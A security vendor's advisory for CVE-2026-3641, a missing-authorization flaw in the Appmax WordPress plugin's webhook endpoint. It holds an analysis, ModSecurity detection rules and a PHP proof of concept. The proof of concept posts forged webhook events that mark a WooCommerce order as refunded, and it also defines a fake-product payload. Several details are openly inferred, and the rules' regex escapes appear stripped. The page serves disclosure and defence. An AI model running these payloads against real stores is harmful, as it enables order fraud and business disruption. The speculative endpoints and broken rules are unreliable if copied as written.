Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 28, 2026

CVE-2026-3641: Appmax <= 1.0.3 – Missing Authorization to Order Status Manipulation and Arbitrary Order Creation via Webhook Endpoint (appmax)

CVE ID CVE-2026-3641
Plugin appmax
Severity Medium (CVSS 5.3)
CWE 20
Vulnerable Version 1.0.3
Patched Version
Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3641 (metadata-based):
The Appmax WordPress plugin version 1.0.3 and earlier contains an unauthenticated webhook endpoint vulnerability. The plugin registers a public REST API endpoint at /webhook-system without implementing authentication or validation mechanisms. This allows remote attackers to manipulate WooCommerce orders and create arbitrary content.

Atomic Edge research identifies the root cause as improper input validation (CWE-20) combined with missing authorization controls. The plugin processes webhook payloads without verifying their origin. The vulnerability description confirms the plugin directly processes untrusted ‘event’ and ‘data’ parameters. This analysis infers the plugin likely uses WordPress REST API registration functions like register_rest_route() without permission_callback or with overly permissive settings. The code probably passes raw POST data directly to WooCommerce order processing functions.

Exploitation requires sending crafted POST requests to the vulnerable endpoint. Attackers target /wp-json/appmax/v1/webhook-system or similar REST routes. The payload includes ‘event’ and ‘data’ parameters mimicking legitimate Appmax webhook events. Example events could be ‘order.created’, ‘order.updated’, or ‘product.created’. The ‘data’ parameter contains serialized order or product information. Attackers can change order statuses to ‘processing’, ‘refunded’, or ‘cancelled’. They can create new orders with arbitrary customer data and pricing.

Remediation requires implementing webhook signature validation and proper authorization. The plugin must verify requests originate from Appmax servers using HMAC signatures or shared secrets. Atomic Edge recommends adding a permission_callback that validates webhook signatures before processing. The plugin should also validate and sanitize all input parameters. WordPress nonces are unsuitable for webhook endpoints since external services cannot generate them. The fix should implement cryptographic verification of request authenticity.

Successful exploitation impacts store operations and data integrity. Attackers can disrupt business by marking paid orders as refunded or cancelling pending orders. They can create fraudulent orders that appear legitimate in the WooCommerce dashboard. Arbitrary product creation allows inventory pollution with malicious listings. While the CVSS score indicates low confidentiality impact (C:N), the integrity impact (I:L) represents significant business risk. Store administrators may face financial losses from order manipulation and operational overhead from cleaning compromised data.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
# Atomic Edge WAF Rule - CVE-2026-3641 (metadata-based)
SecRule REQUEST_URI "@rx ^/(wp-json/|index.php?rest_route=/)appmax/(vd+/)?webhook(-system)?" 
  "id:20263641,phase:2,deny,status:403,chain,msg:'CVE-2026-3641: Appmax plugin unauthorized webhook access',severity:'CRITICAL',tag:'CVE-2026-3641',tag:'WordPress',tag:'Appmax',tag:'WooCommerce'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule &REQUEST_HEADERS:Content-Type "@eq 0" "chain"
      SecRule REQUEST_BODY "@rx "event"s*:s*"(order.|product.)" 
        "setvar:'tx.cve_2026_3641_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

# Alternative rule for JSON Content-Type requests
SecRule REQUEST_URI "@rx ^/(wp-json/|index.php?rest_route=/)appmax/(vd+/)?webhook(-system)?" 
  "id:20263642,phase:2,deny,status:403,chain,msg:'CVE-2026-3641: Appmax plugin unauthorized webhook access (JSON)',severity:'CRITICAL',tag:'CVE-2026-3641',tag:'WordPress',tag:'Appmax'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_HEADERS:Content-Type "@contains application/json" "chain"
      SecRule REQUEST_BODY "@rx "event"s*:s*"(order.|product.)" 
        "setvar:'tx.cve_2026_3641_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3641 - Appmax <= 1.0.3 - Missing Authorization to Order Status Manipulation and Arbitrary Order Creation via Webhook Endpoint
<?php

/**
 * Proof of Concept for CVE-2026-3641
 * Assumptions based on vulnerability description:
 * 1. REST endpoint at /wp-json/appmax/v1/webhook-system (common WordPress REST pattern)
 * 2. Accepts POST requests with 'event' and 'data' parameters
 * 3. No authentication or signature validation required
 * 4. Plugin processes arbitrary webhook events
 */

$target_url = 'https://vulnerable-site.com';

// Common WordPress REST API endpoint patterns for plugin webhooks
$endpoint_candidates = [
    '/wp-json/appmax/v1/webhook-system',
    '/wp-json/appmax/v1/webhook',
    '/wp-json/appmax/webhook-system',
    '/index.php?rest_route=/appmax/v1/webhook-system'
];

$payload = [
    'event' => 'order.updated',
    'data' => [
        'order_id' => 123,
        'status' => 'refunded',
        'reason' => 'Atomic Edge test exploit',
        'timestamp' => time()
    ]
];

foreach ($endpoint_candidates as $endpoint) {
    $url = $target_url . $endpoint;
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/json',
        'User-Agent: Atomic-Edge-PoC/1.0'
    ]);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "Testing: $urln";
    echo "HTTP Code: $http_coden";
    echo "Response: $responsenn";
    
    curl_close($ch);
    
    // If we get a 200/201 response, the endpoint likely exists and processed our request
    if ($http_code >= 200 && $http_code < 300) {
        echo "[+] Potential success at: $urln";
        echo "[+] Sent payload to change order 123 status to 'refunded'n";
        break;
    }
}

// Alternative payload for creating a fake product
$product_payload = [
    'event' => 'product.created',
    'data' => [
        'name' => 'Atomic Edge Test Product',
        'description' => 'Created via CVE-2026-3641 exploit',
        'price' => 0.01,
        'sku' => 'ATOMIC-EDGE-TEST'
    ]
];

echo "nTesting product creation payload...n";

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School